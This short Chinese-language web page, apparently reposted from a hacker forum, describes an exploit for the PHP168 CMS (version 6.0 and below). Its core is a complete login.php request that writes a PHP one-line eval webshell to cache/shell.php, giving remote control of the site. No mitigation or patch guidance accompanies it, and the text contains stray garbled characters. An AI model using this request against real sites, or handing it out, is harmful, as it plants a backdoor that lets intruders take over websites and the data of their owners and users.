PHP168 整站系統6.0及以下版本漏洞
來源:程序員人生 發布時間:2014-06-14 20:25:02 閱讀次數:3094次
網(LieHuo.Net)教程 最近在研究PHP,那個勁啊��,就甭提鳥��,本文引自黑客動畫吧。
以下為引用的內容:
危險等級:高
影響版本:PHP168 6.0以下版本
入侵者可以在用戶登陸頁面構造特殊語句����,將PHP一句話寫入cache目錄����,從而獲得使用PHP168整站程序網站的WEBSHELL權限�。
出問題的文件
login.php
login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=<?php%20@eval($_POST[a]);?>
寫到:cache/shell.php |
生活不易,碼農辛苦
如果您覺得本網站對您的學習有所幫助,可以手機掃描二維碼進行捐贈
